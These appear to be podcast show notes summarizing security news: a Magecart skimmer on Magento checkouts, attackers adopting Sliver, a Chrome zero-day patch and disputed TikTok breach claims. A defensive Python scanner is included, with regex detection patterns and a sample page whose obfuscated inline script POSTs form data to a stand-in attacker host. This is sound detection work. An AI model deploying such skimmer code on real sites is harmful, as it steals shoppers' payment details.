Episode 27: September 05 2022
Links
https://cyware.com/news/magecarts-new-javascript-skimmer-targets-magento-websites-e2b125fc
https://securityaffairs.co/wordpress/135177/cyber-crime/javascript-skimmer-magecart.html
https://www.bleepingcomputer.com/news/security/hackers-adopt-sliver-toolkit-as-a-cobalt-strike-alternative/
https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-new-zero-day-used-in-attacks/?&web_view=true
https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html
https://thehackernews.com/2022/09/tiktok-denies-data-breach-reportedly.html
https://www.bleepingcomputer.com/news/security/tiktok-denies-hack-following-leak-of-user-data-source-code/
https://twitter.com/TikTokComms/status/1566760896571080704
https://twitter.com/MayhemDayOne/status/1566748988770066435
Times
00:36
06:59
14:53
23:13
Magecart’s New JavaScript Skimmer Targets Magento Websites
- Security researchers from Cyble analyzed a recently disclosed Magecart skimmer.
- A post on Twitter discussed a new JavaScript skimmer developed by a Magecart threat group.
- The new skimmer targets Magento e-commerce websites to steal payment details.
- How it works
- The attacker exploits a vulnerability in the Magento e-commerce site and injects malicious code into the payment forms and checkout pages.
- When a user visits the compromised website, the skimmer loads a payment overlay that asks for payment details.
- The malicious JS code ships with standard skimmer anti-detection features.
- The skimmer code is obfuscated, and it checks whether any dev tool is installed in the browser.
- If it detects one, the code terminates to avoid analysis.
- The JavaScript code collects the entered data and sends it to a URL controlled by the attacker.
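As an added example (not from the Cyble write-up or these episode notes), a small Python scanner that turns the behaviours listed above into defensive heuristics for a checkout page: it flags external scripts served from hosts outside an assumed allowlist (`TRUSTED_SCRIPT_HOSTS`, hypothetical) and inline scripts that show assumed indicator patterns (a dev-tools check, obfuscated identifiers or escaped strings, a network call to an absolute URL). The sample HTML is constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the shop expects to serve scripts from (assumption).
TRUSTED_SCRIPT_HOSTS = {"cdn.shop.example"}

# Heuristic indicators of the behaviours the notes describe: a dev-tools check that aborts
# the script, obfuscated identifiers/strings, and a network call to an absolute URL.
# Assumed patterns for illustration, not the skimmer's actual signatures.
INDICATORS = {
    "devtools-check": re.compile(r"outerWidth\s*-\s*(window\.)?innerWidth|\bdebugger\b", re.I),
    "obfuscation": re.compile(r"\b_0x[0-9a-f]{4,}\b|(\\x[0-9a-f]{2}){4,}", re.I),
    "exfil-call": re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b.*https?://", re.I | re.S),
}
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)

def scan_checkout_page(html):
    """Return script hosts outside the allowlist and inline scripts matching indicators.
    Simplified regex extraction is used here instead of a full HTML parser."""
    untrusted, suspicious = [], []
    for n, (attrs, body) in enumerate(SCRIPT_TAG.findall(html)):
        m = SRC_ATTR.search(attrs)
        if m:  # external script: compare its host with the allowlist
            host = urlparse(m.group(1)).hostname  # None for relative (same-origin) paths
            if host and host not in TRUSTED_SCRIPT_HOSTS:
                untrusted.append(m.group(1))
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        if hits:  # inline script showing one or more indicators
            suspicious.append((n, hits))
    return {"untrusted_scripts": untrusted, "suspicious_inline": suspicious}

# Constructed sample page: a same-origin script, a trusted CDN script, a lookalike host,
# a benign inline block, and one inline block that shows all three indicators.
SAMPLE_HTML = """<html><body>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/mage/cart.js"></script>
<script src="https://cdn-shop-example.test/mage/cart.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>
var _0x4f2a=['\\x63\\x61\\x72\\x64','\\x63\\x76\\x76'];
if (window.outerWidth - window.innerWidth > 160) { throw 0; }
fetch('https://collector.example-attacker.test/g', {method:'POST', body: document.forms[0].innerText});
</script>
</body></html>"""

if __name__ == "__main__":
    print(scan_checkout_page(SAMPLE_HTML))
```

Running it on a real checkout page requires fetching the rendered HTML first; the allowlist and patterns should be tuned to the shop's own assets.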
Hackers adopt Sliver toolkit as a Cobalt Strike alternative
- Cobalt Strike has grown in popularity as an attack tool for various threat actors, including ransomware operations, to drop on compromised networks “beacons” that allow moving laterally to high-value systems.
- As defenders have learned to detect and stop attacks relying on this toolkit, hackers are trying other options that can evade Endpoint Detection and Response (EDR) and antivirus solutions.
- Facing stronger defenses against Cobalt Strike, threat actors have found alternatives. Palo Alto Networks observed them switch to Brute Ratel, an adversarial attack simulation tool designed to elude security products.
- A report from Microsoft notes that hackers, from state-sponsored groups to cybercrime gangs, are increasingly using the Go-based Sliver security testing tool, developed by researchers at the cybersecurity company BishopFox, in attacks.
- Threat actors are dumping the Cobalt Strike penetration testing suite for similar frameworks that are less well known.
- Brute Ratel is number 1; Sliver is becoming an attractive alternative.
- Sliver is an open-source, cross-platform kit.
- Not a huge concern
- malicious activity using Sliver can be detected using hunting queries that are available
- Microsoft provides a set of tactics, techniques, and procedures (TTPs) that defenders can use to identify Sliver and other emerging C2 frameworks.
- The Sliver C2 network supports multiple protocols (DNS, HTTP/TLS, MTLS, TCP) and accepts implant/operator connections.
- It can host files to mimic a legitimate web server.
- Listeners can be set up to identify anomalies on the network.
- Microsoft also shared information on how to detect Sliver payloads: shellcode, executables, shared libraries/DLLs, and services.
- For enterprises protected by Defender, Microsoft has created a set of hunting queries for the commands that can run in the Microsoft 365 Defender portal.
Google Chrome emergency update fixes new zero-day used in attacks
- Google has released Chrome 105.0.5195.102 for Windows, Mac, and Linux users to address a single high-severity security flaw, the sixth Chrome zero-day exploited in attacks patched this year.
- “Google is aware of reports that an exploit for CVE-2022-3075 exists in the wild,” the company said in a security advisory published on Friday.
- This new version is rolling out in the Stable Desktop channel, with Google saying that it will reach the entire user base within a matter of days or weeks.
- It was available immediately when BleepingComputer checked for new updates by going into the Chrome menu > Help > About Google Chrome.
- The web browser will also auto-check for new updates and automatically install them after the next launch.
- No exploitation details available
- The zero-day bug fixed today (CVE-2022-3075) is a high severity vulnerability caused by insufficient data validation in Mojo, a collection of runtime libraries that facilitates message passing across arbitrary inter- and intra-process boundaries.
- Google says that this security issue was found by a security researcher who chose to report it anonymously.
- Even though the browser vendor says the zero-day was exploited in the wild, it is yet to share technical details or info regarding these incidents.
- “Access to bug details and links may be kept restricted until a majority of users are updated with a fix,” Google added.
- “We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.”
- By delaying the release of more information on these attacks, Google is likely aiming to give Chrome users enough time to update and prevent exploitation attempts before more threat actors create their own exploits to deploy in attacks.
- Sixth Chrome zero-day fixed in 2022
- With this release, Google has issued a security update for the sixth Chrome zero-day since the start of the year.
- The previous five zero-day vulnerabilities found and patched in 2022 are:
- CVE-2022-2856 – August 17th
- CVE-2022-2294 – July 4th
- CVE-2022-1364 – April 14th
- CVE-2022-1096 – March 25th
- CVE-2022-0609 – February 14th
- As the Google Threat Analysis Group (TAG) revealed in February, CVE-2022-0609 was exploited by North Korean-backed state hackers weeks before the February patch. Furthermore, the earliest signs of exploitation were found in early January.
- The bug was abused in campaigns pushing malware via phishing emails using fake job lures and compromised websites hosting hidden iframes serving exploit kits.
- Given that the zero-day bug patched today is also known to have been exploited by attackers in the wild, it is strongly recommended to upgrade the Google Chrome web browser as soon as possible.
Was TikTok Breached?
- BlueHornet (aka AgainstTheWest) tweeted over the weekend: “Who would have thought that TikTok would decide to store all their internal backend source code on one Alibaba Cloud instance using a trashy password?”
- The account has since been suspended.
- TikTok (ByteDance-owned company): “Our security team investigated these claims and found no evidence of a security breach.”
- Alleged reports of a hack surfaced on the Breach Forums message board on September 3.
- BlueHornet: the server holds 2.05 billion records in a humongous 790GB database.
- Bob Diachenko, threat intelligence researcher at Security Discovery, confirmed that the breach is “real” but said the data is likely to have originated from “Hangzhou Julun Network Technology Co., Ltd rather than TikTok.”
- Not sure where the data originated from, or if 3rd parties have access.
- Troy Hunt, of Have I Been Pwned fame: “This is so far pretty inconclusive; some data matches production info, albeit publicly accessible info,” and “Some data is junk, but it could be non-production or test data. It’s a bit of a mixed bag so far.”